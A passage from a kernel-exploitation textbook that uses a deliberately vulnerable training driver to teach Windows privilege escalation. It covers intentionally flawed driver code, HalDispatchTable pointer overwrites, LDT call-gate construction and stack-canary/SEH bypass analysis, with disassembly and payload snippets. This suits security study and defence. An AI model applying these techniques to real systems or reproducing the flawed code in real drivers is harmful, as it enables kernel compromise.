Despite the fact that this is a far simpler approach than the SID list patching and Privileges patching techniques, there are a couple of drawbacks to its use. First, the token-stealing methodology is a rather invasive approach. It subverts the internal kernel logic, as it allows more processes to access a shared resource without the kernel's awareness. Moreover, any operation done on the access token, although it is shared among processes, gets reflected on the same structures, thereby creating one or more internal inconsistencies, which could create trouble when the exploit process exits. In some circumstances, this could even cause a kernel crash. A safer solution involves the temporary substitution of the access token for only a very brief period of time, during which the exploit process creates a secondary channel to elevate privileges (e.g., install a system service, load a driver, etc.) and then restores the original token.

The other drawback is not a big deal; it basically revolves around the fact that we are stuck with the victim process's token, as is. We can nullify this drawback by adding more code; if we need a special combination of SIDs/Privileges, for example, we'd need to patch the token. In this scenario, choosing the SID list patching or Privileges patching technique is probably better since we'd wind up having to modify the token anyway.

Practical Windows Exploitation

Thus far, we have seen how to elevate the privileges of a target process after getting control of the execution flow. In this section, we will discuss how we can take the execution control flow exploiting the two custom vulnerabilities presented in the DVWD package: the arbitrary memory corruption and a stack buffer overflow. The exploit code is present in the DVWDExploits package, which you can find on this book's companion Web site, www.attackingthecore.com.

Arbitrary Memory Overwrite

Arbitrary memory overwrite, also known as the “write-what-where” vulnerability, is the most common vulnerability affecting Windows kernel drivers. This kind of vulnerability is mainly due to failure or incorrect use of the user-land validation kernel APIs. Notwithstanding this main cause, write-what-where vulnerabilities can also be caused as a direct or indirect consequence of buffer overflows, logical bugs, or race conditions. Usually, when facing this kind of vulnerability we are able to overwrite a controlled memory address with one or more bytes. The content of those bytes may be controlled, partially controlled, or even unknown. Of course, when we have full control over the overwritten bytes the game becomes trivial. In all other scenarios the exploitation vector may change, but kernel arbitrary overwrite vulnerabilities are always likely to be exploitable.

Note

Actually, a lot of write-what-where vulnerabilities have been found in many third-party drivers, not excluding security products like AVs and Host IDSs.

Before showing the different exploitation vectors it is worth introducing the vulnerable DVWD Device I/O Control routine. The vulnerable code is divided into two different I/O Control routines. The former is used to save a user-land memory buffer into kernel memory (DEVICEIO_DVWD_STORE) and the latter is used to retrieve this data back to user land (DEVICEIO_DVWD_OVERWRITE). Of course the vulnerability lays down in the latter I/O Control routine. Let's take a look at the code implementing it:

typedef struct _ARBITRARY_OVERWRITE_STRUCT

{

PVOID StorePtr;

ULONG Size;

} ARBITRARY_OVERWRITE_STRUCT, *PARBITRARY_OVERWRITE_STRUCT;

NTSTATUS TriggerOverwrite(PVOID stream)

{

ARBITRARY_OVERWRITE_STRUCT OverwriteStruct;

NTSTATUS NtStatus = STATUS_SUCCESS;

__try

RtlZeroMemory(&OverwriteStruct,

sizeof(ARBITRARY_OVERWRITE_STRUCT);

ProbeForRead(stream, [1]

sizeof(ARBITRARY_OVERWRITE_STRUCT),

TYPE_ALIGNMENT(char));

RtlCopyMemory(&OverwriteStruct, [2]

stream,

sizeof(ARBITRARY_OVERWRITE_STRUCT));

GetSavedData(&OverwriteStruct); [3]

}

__except(ExceptionFilter())

{

NtStatus = GetExceptionCode();

}

return NtStatus;

}

VOID GetSavedData(PARBITRARY_OVERWRITE_STRUCT OverwriteStruct)

{

ULONG size = OverwriteStruct->Size;

if(size > GlobalOverwriteStruct.Size) [4]

size = GlobalOverwriteStruct.Size;

RtlCopyMemory(OverwriteStruct->StorePtr, [5]

GlobalOverwriteStruct.StorePtr,

size);

}

The function TriggerOverwrite() is called by the DEVICEIO_DVWD_OVERWRITE handler DvwdHandleIoctlOverwrite(). Its unique parameter “PVOID stream” addresses the user-land buffer specified by the calling process via the Device I/O Control routine. This pointer should address a user-land structure of type ARBITRARY_OVERWRITE_STRUCT. The structure is composed of two fields: StorePtr, a pointer to the data buffer and Size, the size of the data. The code verifies that the whole buffer is located within the user-land range [1] and copies it over into a local kernel OverwriteStruct structure [2]. Just after copying the structure into kernel memory it invokes the GetSavedData() function. This function is responsible for copying the previously saved data (DEVICEIO_DVWD_STORE) into the user-land buffer specified by StorePtr. At [4] the code adjusts the actual Size and at [5] it copies the buffer into the user-land buffer. This time the code missed the userland pointer check, as opposed to what occurred before while copying the ARBITRARY_OVERWRITE_STRUCT. The function “trusts” the StorePtr value and copies the content of the saved data over to the memory pointed to by it. If the user-land process specifies an evil value (e.g., a kernel address), the GetSavedData() function ends up overwriting an arbitrary kernel memory range. Since we have been able to save arbitrary data before using the DEVICEIO_DVWD_STORE, later we can overwrite an arbitrary amount of bytes with arbitrary attacker-controlled data. This sample has been written in this way to cover most of the scenarios; for example we can emulate a 4-bytes arbitrary overwrite or a 1-byte arbitrary overwrite by just properly tuning the DEVICEIO_DVWD_STORE Device I/O Control routine.

There are different ways this kind of vulnerability can be exploited. In the next section a couple of those techniques will be shown. It is important to note that these techniques are just two among many different vectors we can use to hijack a kernel control path after overwriting kernel data. The former involves the overwriting of function pointers held by static kernel dispatch tables and the latter targets dynamically allocated kernel structures, from which corresponding addresses can be leaked from unprivileged user-land processes.

Overwriting Kernel Dispatch Tables

Kernel dispatch tables usually hold function pointers. They are mainly used to add a level of indirection between two or more layers (either within or outside the same kernel component/driver). We can think, for example, of the main System Call Table (KiServiceTable) used to invoke kernel system calls (based on an system call index given by the user-land process), or of the Hardware Abstraction Layer (HAL) dispatch table (HalDispatchTable), which is stored in the Kernel Executive and holds the addresses of a few HAL routines. This section will show how to overwrite the HalDispatchTable to execute code at Ring 0. This technique was originally used by Ruben Santamarta and described in his excellent paper, “Exploiting Common Flaws in Drivers.”5 This technique has been chosen among the others mainly for a few reasons: it doesn't need a mandatory recovery, it is stable, and at the time of writing it can also be successfully used on the x64 Windows platform.

First, the HalDispatchTable is located in the Kernel Executive and owns a corresponding exported symbol that can be found using the method presented in the “Kernel Information Gathering” section. After gathering its base address we have to find a suitable entry that is called by a low-frequency routine.

Warning

When overwriting a function pointer with a user-land address (for example when the payload is located in user space like in our case) we have to take care that no other processes will ever execute the routine addressed by the overwritten pointer. Since the payload exists only in the current process address space, trying to execute it while in a different process will likely trigger a kernel crash.

The second entry within the HalDispatchTable fits our needs. This entry is used by an undocumented system call (NtQueryIntervalProfile()) that is not frequently used. Internally, this function calls KeQueryIntervalProfile(), which is shown in the next code snippet (taken from the 32-bit version of Windows):

1: kd> u nt!KeQueryIntervalProfile L37

nt!KeQueryIntervalProfile:

809a1af6 8bff mov edi,edi

809a1af8 55 push ebp

809a1af9 8bec mov ebp,esp

[ … ]

809a1b22 50 push eax

809a1b23 6a0c push 0Ch

809a1b25 6a01 push 1

809a1b27 ff157c408980 call dword ptr [nt!HalDispatchTable+0x4] [1]

809a1b2d 85c0 test eax,eax

809a1b2f 7c0b jl 809a1b3c [2]

809a1b31 807df800 cmp byte ptr [ebp-8],0

809a1b35 7405 je 809a1b3c

809a1b37 8b45fc mov eax,dword ptr [ebp-4] [3]

809a1b3a eb02 jmp 809a1b3e

809a1b3c 33c0 xor eax,eax

809a1b3e c9 leave

809a1b3f c20400 ret 4

As we can see from the snippet the function ends up hitting [1] an indirect CALL using the pointer stored at [HalDispatchTable + 4] (the second entry of the HalDispatchTable). What we have to do is simply overwrite this function pointer, replacing it with the address of our payload. We just need to take care of two more things: the inter-procedure calling convention and the return value. Since our payload will have to behave like the original function we have to respect the calling convention used and, last but not least, we have to return a value that the caller expects. Based on the return value the code can jump at [2] to the final prolog that will set the EAX register to zero before returning. Since the other branch at [3] will just jump after the instruction that sets the EAX register to zero, we can assume that our payload is safe to return NULL.

What about the calling convention? Let's take a look at the original routine HaliQuerySystemInformation() to discover the calling convention used:

0: kd> dd nt!HalDispatchTable

80894078 00000003 80a79a1e 80a7b9f4 808e7028

80894088 00000000 8081a7a4 808e61d2 808e6a68

[ … ]

0: kd> u 80a79a1e

hal!HaliQuerySystemInformation:

80a79a1e 8bff mov edi,edi

80a79a20 55 push ebp

[…]

80a79aec 5e pop esi

80a79aed 5b pop ebx

80a79aee e80d8efeff call hal!KeFlushWriteBuffer (80a62900)

80a79af3 c9 leave

80a79af4 c21000 ret 10h

This function has a single exit point that returns to the caller with the RET 10H instruction after having already adjusted the local stack frame with the LEAVE instruction. This means that the function has been called using the __stdcall calling convention. With this convention the callee cleans the stack. In this particular case the function cleans 10H (16) bytes from the stack that correspond to four arguments. We then have to create a function that will wrap our payload. This wrapper will be declared with the same calling convention and with the same number argument of the original overwritten function:

ULONG_PTR __stdcall

UserShellcodeSIDListPatchUser4Args(DWORD Arg1,

DWORD Arg2,

DWORD Arg3,

DWORD Arg4)

{

UserShellcodeSIDListPatchUser();

return 0;

}

In this way the compiler will generate code that will keep the stack synched.

Note

Sometimes it is not necessary to align the stack using the correct calling convention if the hooked function is called just before the caller returns. If this happens, and the kernel is compiled using the frame pointer (like the 32-bit version of the Windows Server 2003 kernel) the parent will adjust the stack anyway using the LEAVE instruction. In this way the stack will be aligned correctly and no faults will ever be caused by the desynchronized stack pointer.

One-Byte Overwrite Case Study

If we are able to overwrite all four bytes stored in the second entry of the HalDispatchTable we can easily substitute the actual value with the address of our payload. But what can we do instead if we are only able to overwrite just one byte? In the case where we can call the vulnerable code path multiple times we can simply overwrite one byte a time. But what if the vulnerable function can be triggered only once? Then the answer (at least on 32-bit system) is straightforward: we have to overwrite the MSB (most significant byte). If we know the byte value we can simply ignore the remaining bytes and map the corresponding 16MB user-land address range with a NOP sled before actually calling the payload. Here's an example that will clarify the ideas: we can overwrite one byte with the value 0x01 only once. This is the partial dump of the HalDispatchTable:

0: kd> dd nt!HalDispatchTable

80894078 00000003 80a79a1e 80a7b9f4 808e7028

80894088 00000000 8081a7a4 808e61d2 808e6a68

[ … ]

The second entry is 0x80A79A1E. If we overwrite the MSB with the 0x01 value we end up having 0x01A79A1E. Even if we don't know the other three bytes that compose the final address we can simply map the 16MB range 0x01000000–0x02000000 as RWX (read-write-execute), storing there a long series of NOP instructions ending with a final jump to our payload.

Overwriting Kernel Control Structures

Function pointers are not the only good targets. We can overwrite any other kernel structure that modifies the user-land-to-kernel interface. One interesting way to deal with user-land-to-kernel interfaces (or gates) is to modify processor-related tables. As we saw in Chapter 3 if we can modify the IDT, GDT, or the LDT, we can introduce a new “kernel gate.” This section will show how to automatically overwrite the LDT descriptor within the GDT table, by redirecting the LDT table in user land. This approach has been chosen among the others (e.g., direct GDT/LDT modification) because in this scenario we are able to successfully exploit the arbitrary overwrite vulnerability by just patching one byte with partially controlled or uncontrolled data.

A similar technique has been used for ages by a few rootkits to locate system-wide open file descriptors and to stealthily open a kernel gate, avoiding having to load drivers on demand. As mentioned before, we can exploit a lot of different vectors and the one shown next is just one among many we can choose from. For example, the direct LDT overwrite vector, described recently by Jurczyk M and Coldwind G,6 can also be used.

Leaking the KPROCESS Address

Windows has a lot of undocumented system calls that do nice things. We have met one of them before, while looking for a way to enumerate device drivers’ base addresses: ZwQuerySystemInformation(). This function can also be used to enumerate the kernel address of the KPROCESS structure of the current running process. The function that implements the KPROCESS search is named FindCurrentEPROCESS(). The full code, as usual, can be found on this book's companion Web site, www.attackingthecore.com.

This function first opens a new file handle to the current process object using the OpenProcess() API. After having opened a valid handle it invokes the ZwQuerySystemInformation() API using SystemHandleInformation as a SYSTEM_INFORMATION_CLASS parameter. This function retrieves all the open handles in the system. Every entry is composed of a SYSTEM_HANDLE_INFORMATION_ENTRY whose layout is shown below:

typedef struct _SYSTEM_HANDLE_INFORMATION_ENTRY

{

ULONG ProcessId;

BYTE ObjectTypeNumber;

BYTE Flags;

SHORT Handle;

PVOID Object;

ULONG GrantedAccess;

} SYSTEM_HANDLE_INFORMATION_ENTRY,

*PSYSTEM_HANDLE_INFORMATION_ENTRY;

The Object field holds the linear address of the dynamically allocated kernel object related to the given handle that is stored in the Handle field. The function looks for an entry that has the ProcessId field equal to the current process ID and the Handle field equal to the just-opened process handle. The final Object field of the located entry is thus the KPROCESS structure address of the current process.

Note

Since the KPROCESS is the first embedded field within the EPROCESS structure, the address of the KPROCESS structure is always equal to the address of the EPROCESS structure as well.

From this point onward we can overwrite an arbitrary element of the KPROCESS (and thus also the EPROCESS) structure. Let's take a look at a few interesting fields we can overwrite within the KPROCESS structure:

0: kd> dt nt!_kprocess 859b6ce0

+0x000 Header : _DISPATCHER_HEADER

+0x010 ProfileListHead : _LIST_ENTRY

+0x018 DirectoryTableBase : [2] 0x3fafe3c0

+0x020 LdtDescriptor : _KGDTENTRY

+0x028 Int21Descriptor : _KIDTENTRY

+0x030 IopmOffset : 0x20ac

+0x032 Iopl : 0 ''

[ … ]

At the beginning of the KPROCESS structure there are a couple of very interesting entries: a KGDTENTRY structure (LdtDescriptor) and a KIDTENTRY (Int21Descriptor). The former structure represents the local process LDT segment descriptor entry. This special system segment entry is stored within the global descriptor table (GDT) during every context switch and describes the location and size of the current local descriptor table (LDT) in memory. The latter entry represents the 21th interrupt descriptor table (IDT) entry used mainly by the virtual DOS machine (NTVDM.exe) to emulate vm86 (virtual 8086 mode) processes. This entry is needed to emulate the original INT 21h software interrupt. This interrupt was used as an entry point to emulate old DOS system service routines. Overwriting the former GDT entry (through the saved LDT segment descriptor) we can remap the whole LDT into user-land memory. After having gained full access to the LDT we can simply build up an inter-privileged call gate to run Ring 0 code. Similarly, overwriting the 21h IDT entry we can build a new trap gate that will fulfill the same result: running arbitrary code at Ring 0.

Next, we will briefly show how to exploit the former vector to build an arbitrary call gate, remapping the whole LDT into the user-land memory. A call gate is a gate descriptor that can be stored within the LDT or the GDT. It provides a way to jump to a different segment located at a different privilege.

The main function implementing this exploitation vector is called LDTDescOverwrite(). As usual, the highly-commented full code is available within the DVWDExploits package. First, it creates and initializes a new LDT using the undocumented ZwSetInformationProcess() API that has the following prototype:

typedef enum _PROCESS_INFORMATION_CLASS

{

ProcessLdtInformation = 10

} PROCESS_INFORMATION_CLASS;

NTSTATUS __stdcall

ZwSetInformationProcess

(HANDLE ProcessHandle,

PROCESS_INFORMATION_CLASS ProcessInformationClass,

PPROCESS_LDT_INFORMATION ProcessInformation,

ULONG ProcessInformationLength);

The first parameter has to be a valid process handle (acquired via OpenProcess() API). The second parameter is the process information class type: ProcessLdtInformation. The third parameter holds the pointer to a PROCESS_LDT_INFORMATION structure and the fourth parameter is the size of the aforementioned structure. The PROCESS_LDT_INFORMATION has the following structure:

typedef struct _PROCESS_LDT_INFORMATION

{

ULONG Start;

ULONG Length;

LDT_ENTRY LdtEntries[…];

} PROCESS_LDT_INFORMATION, *PPROCESS_LDT_INFORMATION;

The Start field indexes the first available descriptor within the LDT. The LdtEntries array holds an arbitrary number of LDT_ENTRY structures, and the Length is the size of the LdtEntries array. An LDT_ENTRY may identify a system segment (task-gate segment), a segment descriptor (data or code segment descriptor) or a call/task gate. Every LDT entry is 8-bytes wide on 32-bit architectures and 16-bytes wide on x64 architectures.

Note

It is important not to muddle between an LDT segment descriptor (a special system segment that can be stored only within the GDT and that identifies the location of the LDT) from all the other segments/gates that can be stored both on GDT or LDT (but trap/interrupt gate that can be stored only on the IDT).

Of course, as we can imagine, the ZwSetInformationProcess() API lets us create a subset of all possible code and data segments, denying every attempt to create a system segment or gate descriptor. After invoking this call the kernel allocates space for the LDT, initializes the LDT entries and installs the LDT segment descriptor into the current processor GDT. Moreover, since every process can have its own LDT the kernel saves the LDT segment descriptor into the KPROCESS kernel structure LdtDescriptor, as described above. After a process context switch the kernel checks if the new process has a different active LDT segment descriptor and installs it in the current processor GDT before passing control back to the process. What we need to do can be summarized in the following steps:

  • Build an assembly wrapper to the payload to be able to return from the call gate (using a FAR RET).

    This step can be accomplished by writing a small assembly stub that saves the actual context, sets the correct kernel segment selector, invokes the actual payload, and returns to the caller restoring the previous context and issuing a far return. The following is an example of code performing it on 32-bit architecture:

    0: kd> u 00407090 L9

    00407090 60 pushad

    00407091 0fa0 push fs

    00407093 66b83000 mov ax,30h

    00407097 8ee0 mov fs,ax

    00407099 b841414141 mov eax,CShellcode

    0040709e ffd0 call eax

    004070a0 0fa1 pop fs

    004070a2 61 popad

    004070a3 cb retf

    The code saves all the general purpose registers and the FS segment register. Next, it loads the new FS segment addressing the current KPCR (Kernel Processor Control Region) and invokes the kernel payload. At the end, before exiting, the code restores the FS segment selector and general-purpose registers and executes a far return to switch-back in user land.

  • Build a fake user-land LDT within a page-aligned address.

    This step is straightforward. We just have to map an anonymous writable page-aligned area in memory using the CreateFileMapping()/MapViewOfFile() API pair.

  • Fill the fake user-land LDT with a single call gate (entry 0) with the following characteristics:

    • The DPL must be 3 (accessible from user space)

    • The code segment selector must be the kernel code segment

    • The offset must be the address of our user-land payload

    This step is moved forward by the PrepareCallGate32() function that is shown next:

    VOID PrepareCallGate32(PCALL_GATE32 pGate, PVOID Payload)

    {

    ULONG_PTR IPayload = (ULONG_PTR)Payload;

    RtlZeroMemory(pGate, sizeof(CALL_GATE32));

    pGate->Fields.OffsetHigh = (IPayload & 0xFFFF0000) >> 16;

    pGate->Fields.OffsetLow = (IPayload & 0x0000FFFF);

    pGate->Fields.Type = 12;

    pGate->Fields.Param = 0;

    pGate->Fields.Present = 1;

    pGate->Fields.SegmentSelector = 1 << 3;

    pGate->Fields.Dpl = 3;

    }

    The code takes two parameters: the pointer to the call gate descriptor (in our case the first LDT_ENTRY of the fake user-land LDT) and a pointer to the payload. The type field identifies the type of segment. Of course the value “12” indicates a call gate descriptor. The Param field of the gate descriptor indicates the number of parameters that have to be copied to the callee stack while invoking the gate. We have to take this value into account since we need to restore the stack properly during the execution of the far return.

  • Locate the LDT descriptor, adding the correct offset to the address of the KPROCESS structure previously leaked by the FindCurrentEPROCESS() function.

  • Trigger the vulnerability to overwrite the LDT descriptor stored within the KPROCESS structure.

    The LdtDescriptor field of the KPROCESS structure is located 0x20 bytes forward of the beginning of the structure. We need to overwrite the address (offset) within the descriptor that locates the LDT in memory. Similar to what we have done with the previous vector, we can overwrite the whole descriptor or just the MSB. If we overwrite just the MSB we also have to create a lot of fake-LDTs all over the target 16MB at the start of every in-range page (as much as we created the NOP sled before).

  • Force a process context switch.

    Since the LDT segment descriptor is updated only after a context switch we need to put the process to sleep or reschedule it before attempting to use the gate. It is enough to call an API that puts the process to sleep like SleepEx(). At the next reschedule the kernel will set up the modified version of the LDT segment descriptor remapping the LDT in user land.

  • Trigger the call gate via a FAR CALL.

    To step into the call gate we need to execute a FAR CALL instruction. Again we can write a small assembly stub to do the job. The next snippet shows the code within the FarCall() function that performs the FAR CALL.

    0: kd> u TestJump

    [ … ]

    004023be 9a000000000700 call 0007:00000000

    [ … ]

    As we can see, the code executes a CALL explicitly specifying a segment selector (0x07) and an offset (0x00000000) that is ignored during the call gate call but is mandatory for the assembly instruction format. As we have seen in Chapter 3 a segment selector is built up by three elements. The first less-significant bit is the requested privilege level (RPL), the second less significant bit is the table indicator (TI) flag and the remainder is the index of the descriptor within the GDT/LDT. In this case the segment selector has an RPL equal to three, a TI flag equal to one and the descriptor index equal to zero. As expected this means that the selector is addressing the LDT (TI=1) and that we are interested in the already-set-up LDT_ENTRY (the first one) that has an index value equal to zero.

Stack Buffer Overflow

Despite the fact that stack-based buffer overflows are not nearly as common as arbitrary memory overwrites, these types of vulnerabilities still exist. Because the main kernel components Microsoft ships (together with many third-party drivers) are compiled by default with stack canary (/GS - Buffer Security Check) compiler-based protection, the ease of exploiting this type of vulnerability has decreased. Regardless of this protection, however, we will see that it is still possible to exploit stack-based buffer overflows in a number of ways. What follows is an analysis of the current stack canary implementation (on both 32-bit and 64-bit) as well as all of the contexts, along with their respective prerequisites, where this protection can be bypassed. Since a lot of vulnerabilities in these operating systems are directly or indirectly caused by bad user-space parameter validation logic, we have chosen to place the vulnerable dummy code within a function running in process context (IRQL == PASSIVE_LEVEL) that directly manipulates user-space arguments (as many third-party drivers, system call wrappers, etc., do). You can find this function in the StackOverflow.c file.

The following code shows the TriggerOverflow() function, which can be invoked by calling the DEVICEIO_DVWD_STACKOVERFLOW I/O Control code:

#define LOCAL_BUFF 64

NTSTATUS TriggerOverflow(UCHAR *stream, UINT32 len)

{

char buf[LOCAL_BUFF]; [1]

NTSTATUS NtStatus = STATUS_SUCCESS;

__try

{

ProbeForRead(stream, len, TYPE_ALIGNMENT(char)); [2]

RtlCopyMemory(buf, stream, len); [3]

DbgPrint("[-] Copied: %d bytes, first byte: %c ", [4]

len, buf[0]);

}

__except(EXCEPTION_EXECUTE_HANDLER) [5]

{

NtStatus = GetExceptionCode();

DbgPrint("[!!] Exception Triggered: Handler body: Code: %d ",[6]

NtStatus);

}

return NtStatus;

}

This function statically allocates a local 64-byte-wide buffer within the stack at [1], with the remainder enclosed within a __try/__except block. As we discussed in the section “User to Kernel/Kernel to User,” the exception block is mandatory, since the kernel gets direct access to user land. Within the __try block, at [2], the function checks the user-supplied memory buffer address, using the ProbeForRead() function. This function probes only the validity of the user-land address without verifying that the actual buffer still exists. At [3], the code invokes the RtlCopyMemory() function (which is actually a memcpy()-like function), which copies the content of the user-land buffer (addressed by the stream pointer) to the local stack kernel buffer (buf). The len parameter has been taken directly from user land, and is not checked. This implies that invoking a DEVICEIO_DVWD_STACKOVERFLOW I/O Control routine with a len parameter greater than 64 will trigger a kernel stack buffer overflow.

Knowing this, we should start to look at what happens when a larger buffer is passed, such as a 128-byte buffer. An excerpt of the WinDbg output from such an attempt follows:

*** Fatal System Error: 0x000000f7

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.

Use !analyze -v to get detailed debugging information.

BugCheck F7, {f67d9d8a, f79a7ec1, 865813e, 0}

Probably caused by : dvwd.sys ( dvwd+14a2 )

As we can see here, the system hangs with a fatal error code—0x000000F7 (247 in decimal), which is a BugCheck code. The Windows kernel issues a BugCheck when it detects a dangerous condition, such as kernel data corruption; when the kernel detects this sort of condition, it can no longer operate safely. When a BugCheck is caused by a detected data corruption, for example, the kernel blocks its execution flow to avoid further damage to the system, thereby hanging the system (hence the famous Blue Screen of Death [BSOD]). The last piece of information that the fault gives up is the faulting driver's name, dvwd.sys, along with the offset of the offending code.

We can get a better view of the problem by invoking the !analyze –v WinDbg extension command. This extension command displays information about the current exception or BugCheck. The following excerpt shows this command's output:

0: kd> !analyze -v

DRIVER_OVERRAN_STACK_BUFFER (f7)

A driver has overrun a stack-based buffer. This overrun could potentially

allow a malicious user to gain control of this machine.

DESCRIPTION

A driver overran a stack-based buffer (or local variable) in a way that would

have overwritten the function's return address and jumped back to an arbitrary

address when the function returned. This is the classic "buffer overrun"

hacking attack and the system has been brought down to prevent a malicious user

from gaining complete control of it.

Do a kb to get a stack backtrace -- the last routine on the stack before the

buffer overrun handlers and bugcheck call is the one that overran its local

variable(s).

Arguments:

Arg1: f67d9d8a, Actual security check cookie from the stack

Arg2: f79a7ec1, Expected security check cookie

Arg3: 0865813e, Complement of the expected security check cookie

Arg4: 00000000, zero

As we can see from the preceding command output, BugCheck 0xF7 corresponds to the DRIVER_OVERRUN_STACK_BUFFER code which, as suggested by its name, is related to the kernel stack corruption that we've triggered. This error confirms for us the presence of the canary. The command's output gives us more information about the state of the stack canary, such as the actual security cookie value and the expected value; of course, those values don't match, since the canary got corrupted during the overflow.

As we'll soon see, stack canary protection varies slightly among the different Windows releases. Moreover, the preconditions and techniques that we can use to bypass this protection differ between 32-bit and 64-bit systems. In the rest of this chapter, we will analyze the exploitation of the aforementioned stack buffer overflow from both a 32-bit and a 64-bit perspective, utilizing Windows Server 2003 SP2 as our 32-bit platform and Windows Server 2008 R2 as our 64-bit platform. We'll begin with the 32-bit scenario.

Windows Server 2003 32-bit Scenario

To better understand kernel stack canary behavior, we need to take a deeper look at the code implementing it. The following snippet represents the assembly prologue of the TriggerOverflow() function compiled by the current WDK on a Windows Server 2003 SP2 32-bit system.

Note

At the time of this writing, the WDK version number was 7600.16385.0. A different version of the WDK may generate slightly different code.

dvwd!TriggerOverflow:

f7773120 6a50 push 50h [1]

f7773122 68581177f7 push off dvwd!__safe_se_handler_table+0x8 [2]

f7773127 e8d8cfffff call dvwd!__SEH_prolog4_GS (f7770104)[3]

f777312c 8b7508 mov esi,dword ptr [ebp+8]

f777312f 33db xor ebx,ebx

[ … ]

f7773198 mov dword ptr [ebp-4], 0FFFFFFFEh

f777319f mov eax, ebx

f77731a1 call dvwd!__SEH_epilog4_GS [4]

f77731a6 retn 8 [5]

The prologue of this function simply invokes __SEH_prolog4_GS(), pushing the size of the local frame at [1] and the data address where the safe handler table is stored at [2]. The local frame is then set up by the custom assembly-written function __SEH_prolog4_GS(), called at [3]. This is a special assembly-written tail stub-function that is used as a helper routine to set up both the caller's exception handler block and the stack canary. At the end of the function, before returning (at [5]), the function calls __SEH_epilog4_GS() [4]. This function gets the current in-stack security cookie and invokes the __security_check_cookie() function, which compares the current security cookie with the master security cookie stored in the .data segment of the driver (the one identified by the __security_cookie symbol that was originally used to set up the current cookie on the stack frame during the function prologue by the __SEH_prolog4_GS() function). If this cookie doesn't match the master cookie, the function invokes the __report_gs_failure() function, which in turn calls the KeBugCheckEx() core kernel function, passing the BugCheck code (F7H-DRIVER_OVERRAN_STACK_BUFFER), the actual corrupted cookie, and the master cookie, and then freezing the box with the system error we analyzed previously.

Tip

Despite the fact that the structured exception handling block is set up along with the GS cookie, these two elements are completely different. The __SEH_prolog4_GS() function holds just one of the possible SEH initialization codes; for example, the __SEH_prolog4() function (without the GS extension) is used in frames that contain an exception handling block but that do not implement the stack canary protection mechanism. Moreover, a special prologue also exists to install the stack canary without setting up the SEH exception block (e.g., where the compiler detects that the code needs to be protected by the stack canary but no exception handling code is present in the source).

Figure 6.6 shows the function frame set up by the __SEH_prolog4_GS() function.

Image

Figure 6.6 SEH + GS function frame on windows server 2003 – 32bit.

dvwd!__SEH_prolog4_GS:

f7770104 68600177f7 push offset svwd!_except_handler4 [1]

f7770109 64ff3500000000 push dword ptr fs:[0] [2]

f7770110 8b442410 mov eax,dword ptr [esp+10h]

f7770114 896c2410 mov dword ptr [esp+10h],ebp

f7770118 8d6c2410 lea ebp,[esp+10h]

f777011c 2be0 sub esp,eax [3]

f777011e 53 push ebx

f777011f 56 push esi

f7770120 57 push edi

f7770121 a1902077f7 mov eax,dword ptr [dvwd!__security_cookie] [4]

f7770126 3145fc xor dword ptr [ebp-4],eax [5]

f7770129 33c5 xor eax,ebp [6]

f777012b 8945e4 mov dword ptr [ebp-1Ch],eax [7]

f777012e 50 push eax

f777012f 8965e8 mov dword ptr [ebp-18h],esp [8]

f7770132 ff75f8 push dword ptr [ebp-8]

f7770135 8b45fc mov eax,dword ptr [ebp-4]

f7770138 c745fcfeffffff mov dword ptr [ebp-4],0FFFFFFFEh

f777013f 8945f8 mov dword ptr [ebp-8],eax

f7770142 8d45f0 lea eax,[ebp-10h]

f7770145 64a300000000 mov dword ptr fs:[00000000h],eax [9]

f777014b c3 ret

The exception registration mechanism works pretty much like its user-space counterpart. First, the function creates a local new EXCEPTION_REGISTRATION_RECORD in the current stack, pushing an exception handler and a pointer to the next registration record. An EXCEPTION_REGISTRATION_RECORD is made up of two pointers: the first pointer addresses the next EXCEPTION_REGISTRATION_RECORD in the exception chain, while the second pointer addresses the associated handler function. The exception handler is pushed at [1] (symbol name __except_handler_4). Every process, while in kernel mode, has the FS segment selector properly set up to point to the current kernel KPCR. The first field of the KPCR, addressed via FS:[0], holds the pointer to the current (last) EXCEPTION_REGISTRATION_RECORD structure; thus, at this point in the code, the next pointer gets taken directly from the FS register (FS:[0]). After the final exception registration record has been set up, the code at [3] allocates the space for the current local frame (based on the second parameter that's been passed). At [4], the function saves the current value of the master security cookie, which is located via the __security_cookie local symbol, into the EAX register. The cookie value is XORed against the actual safe handler table on the stack (at [5]) and against the value of the current EBP (at [6]). Next, the EBP-XORed cookie is saved into the stack, at [7], together with the current ESP pointer, at [8]. Finally, at [9], the code registers the current EXCEPTION_REGISTRATION_RECORD (placed within the current stack) into the KPCR.

At this point, all of the meaningful stack variables seem to be successfully protected by the stack canary.

To get around this, we have two possible approaches to choose from: 1) we can try, where possible, to modify the return address (which actually is not XORed with the cookie) without modifying the stack canary; or 2) we can somehow subvert the kernel control flow before the actual security cookie check takes place at the end of the function.

The first approach has a major prerequisite: either the buffer overflow must be index-based, or we need to partially control the destination address used within the copy function. If one of these prerequisites has been met, we can begin copying our payload close to the return address without trashing the stack canary. This, unfortunately, is not the case in the current scenario: the RtlCopyMemory() of our dummy driver directly specifies the function destination address (the beginning of the stack buffer) and there is no way to overwrite the return address without trashing the security cookie.

To succeed, we will need to find another way to subvert the control flow before the function returns. The first idea that comes to mind involves structured exception handling abuse. This technique has been used heavily in the past few years to exploit user-land stack overflows; as an example, one of the first widespread worms, Code Red, made use of the SEH handler overwrite technique. The SEH overwrite technique is able to not only get program control flow without relying on the in-stack return address, but also can bypass user-land stack canary protection. Since the user-land stack canary implementation is very similar to its kernel counterpart, this technique, when the SEH frame is available, can also be used (and abused) against kernel stack vulnerabilities. The technique consists of overwriting the last EXCEPTION_REGISTRATION_RECORD saved in the current stack to hijack the exception that handles control flow. Of course, we'll need to be able to trigger an exception before the function holding the target buffer returns. Before taking a look at how to trigger the exception, it's worth making sure that this approach can also be abused in a kernel-space scenario.

The following stack trace shows the functions involved in the exception handling mechanism after the local stack frame has been overwritten with the famous “AAAAAA…” character series (in hexadecimal: 0x41414141):

0: kd> k

ChildEBP RetAddr

f659060c 8088edae 0x41414141 [3]

f6590630 8088ed80 nt!ExecuteHandler2+0x26

f65906e0 8082d5af nt!ExecuteHandler+0x24

f65906e0 8082d5af nt!RtlDispatchException+0x59

f6590a98 8088a2aa nt!KiDispatchException+0x131 [2]

f6590b00 8088a25e nt!CommonDispatchException+0x4a

f6590b84 f784b162 nt!KiExceptionExit+0x186

f6590c10 f784b1cc ioctlsample!TriggerOverflow+0x42 [1]

f6590c20 f784b0fe ioctlsample!DvwdHandleIoctlStackOverflow+0x1e

